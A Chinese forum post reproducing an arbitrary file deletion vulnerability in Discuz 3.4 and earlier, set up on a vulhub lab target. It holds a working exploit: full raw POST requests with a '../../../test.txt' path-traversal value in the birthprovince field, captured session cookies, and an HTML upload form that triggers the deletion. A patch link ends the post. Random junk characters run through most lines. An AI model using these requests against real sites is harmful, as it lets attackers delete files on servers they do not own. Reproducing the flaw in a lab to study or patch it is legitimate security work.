|
|
" `9 z+ Q7 ^% K; ]7 }' t9 L7 F" U( m3 M; `
前言:9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。
. _2 [% V7 e" J/ v4 A3 s5 \影响版本:Discuz < =3.4 环境$ S! v. g& P! f
9 M( i! e6 ^* M# [( M( F+ G
复现过程:首先在discuz目录下新建一个test.txt文件,到时候删除用。) y( d0 m L5 S. U
新建test.txt
* h. J0 x" P& d1 {5 g访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。
1 T' j/ Z; b& s( j# t+ r# L& M8 o9 @9 D# ^$ q' S
& v7 F% k5 U a查看formhash
/ `, P5 {6 o4 _+ t" P; M3 Z: L利用burp抓包,获取cookie9 A1 E! e; n3 U# C3 n
8 x: W, ?& s: E& A7 J' {% g
7 G: h! v( y3 M0 p; H+ D1 q4 ^
/ G% _# n, h" W. {3 {0 V& P1 n8 {
 ) e: |- |. j2 j1 B
# W/ i; r% e" l4 {
抓取cookie% v: H0 B, `9 ]. y
6 R6 d/ J3 E# i发送下面数据包:修改cookie,formhash,还有删除的文件* ^+ D5 i3 n- O6 p9 ?6 x2 ]
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
1 g$ ~1 u6 |' v" ^# JHost: localhost
: u& J! g i6 ^% y3 tContent-Length: 367
$ X) h; n) ^. B5 ^9 ECache-Control: max-age=0
% m6 t: {+ q2 R4 rUpgrade-Insecure-Requests: 1
* ^4 p+ g5 }3 W' ^ c' AContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s% x4 O& k# s4 @, d/ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36: ~2 x. q2 d5 Q' S, W' n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' D0 w# C, y) @# S7 k6 g
Accept-Encoding: gzip, deflate
7 l- o4 ~ y9 F. G' YAccept-Language: zh-CN,zh;q=0.8,en;q=0.6
* s! l0 A P o8 P6 `Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056: N8 N |7 w. y) X
Connection: close
+ A: n9 n! b: a( v/ W2 S------WebKitFormBoundaryPFvXyxL45f34L12s
2 R$ p' {# |1 h+ s' H; \Content-Disposition: form-data; name="formhash"
! }& a$ e/ V1 z3 [84a7f376
$ l5 t1 Z0 C6 ]! \& S. q------WebKitFormBoundaryPFvXyxL45f34L12s+ B: g; F0 {' L5 d5 G3 D- K, B
Content-Disposition: form-data; name="birthprovince"* X# t9 d( ^7 Q
../../../test.txt
& \% ?: T' e" D' v, ]+ S------WebKitFormBoundaryPFvXyxL45f34L12s
1 b0 j: T A$ Y* n- F dContent-Disposition: form-data; name="profilesubmit"
|* e" e; A6 Y B' i3 o: ]* O12 l4 t3 b! u2 Z! j4 Q
------WebKitFormBoundaryPFvXyxL45f34L12s--/ D& J5 j! X4 R* D7 k/ l
发送删除的数据包
5 E) d( ~, n3 m9 U+ Y刷新页面,查看出生地就会显示成下图所示的状态:
8 x- j8 U5 @% u$ H/ I: x5 g. |9 L数据成功写入
- {" p: L7 M! I/ O
& g! e8 I4 M4 W2 ]% ^" M( _8 m5 P
6 h+ G3 P# J) G说明数据已经进入数据库:
5 p, r2 t$ A% S3 k0 A然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:
% w' C; |3 Q! x& e+ R* j<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">
7 z2 ?/ v& l; ~- W+ J<input type="file"name="birthprovince" id="file" />% X, b. f: a Y% k% N5 ~+ K
<input type="text"name="formhash" value="84a7f376"/></p>8 y4 e$ S% `# m; U
<input type="text"name="profilesubmit" value="1"/></p>( f, e5 S u! a0 v+ X# R g5 h
<input type="submit"value="Submit" />
. S8 b4 \0 |, z+ J7 s4 P7 J</from>; b8 n+ B+ o6 s" h
0 l4 K1 e, m$ s0 {- Z& F% u' P5 }
+ s2 Y% q% S; P+ W' I; P q- p" O
|; `3 {5 V8 t; B, w* g% ?6 H. H6 C, n% T) |
6 S' e9 \) ^5 q0 d5 n或者直接构建数据包:7 c: H) H9 S+ t0 `1 w
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
# \: t, L. n5 xHost: 192.168.220.1311 P# K7 q4 ^+ ^4 }* w3 r, M; L- V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
" j8 B: ?- h- KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.87 l/ b- \( W. T9 Z- B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% M. s$ U. r2 p) {Accept-Encoding: gzip, deflate4 a1 h$ m- m; k. R! H
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
+ Z# u' W2 y, d9 n) _Content-Length: 91989' W8 y) M% C9 n* ]" M1 ?
Connection: close& _/ X8 _4 z* m! `& H
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
! P4 S5 g; F: ?0 `: X( v. O* i( yUpgrade-Insecure-Requests: 14 a) s0 E2 |+ Y6 ~) `. t
-----------------------------123821742118716( P0 K$ Y) k3 \: l3 p3 ?
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg") K0 x6 }7 _5 ]
Content-Type: image/jpeg. f2 O! Y3 ?7 n1 n
zerba(这里写啥都可以)
# \0 k( O( g+ \( B6 I7 [& |! I& `" L-----------------------------123821742118716--
) x; x" w* d1 X7 W% C9 W. Y# Y& _4 I3 l- P$ S T' Q
W+ U4 F9 g- ~, @ E! \! b0 w
# g3 L, |# P8 `5 N a! s0 N% A4 O! L6 c+ h
8 a- Q# O2 b+ w0 c. m3 n3 s. o9 `; i
+ Q9 _& q! R3 S
7 x4 w1 p# i _' h2 ~: h7 c3 d: U& S9 e# D
; T! v9 f: }3 g; ^% z4 I: }
& q" i7 x9 F. n/ C) y7 C7 F T* f进去discuz看看,可以看到,test.txt文件已经被删除了。# ? S8 S) X! _+ p' t
# N# V/ Z9 D0 {2 w6 ~/ ?5 [* T4 X. C5 p! V- s4 o
0 C Q# n( B" D+ u1 r; V
& C; b0 b% T% k8 Z* M
' A, ]; C7 V; y修复建议:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574+ @* a( Y+ k! @. ~" h, X$ Z8 F
编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。! U: E+ a3 ~! H
8 t+ B b8 d, D5 l+ `) m
6 e' L% o; ?/ a4 T/ A c; { N6 i. [+ J3 h$ c/ N8 ~
) K% U2 o. m4 C
" F) W9 ]9 q+ L! q- p
5 p9 \: @% H% m1 D! p/ O
; u0 I3 W5 N% Y! o* [( q
: P7 X3 H* {9 [$ R5 {5 ? @2 q% D5 |6 `- N w& k- ?; g
|
|
窥视卡
雷达卡
发表于 2022-6-25 08:59:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜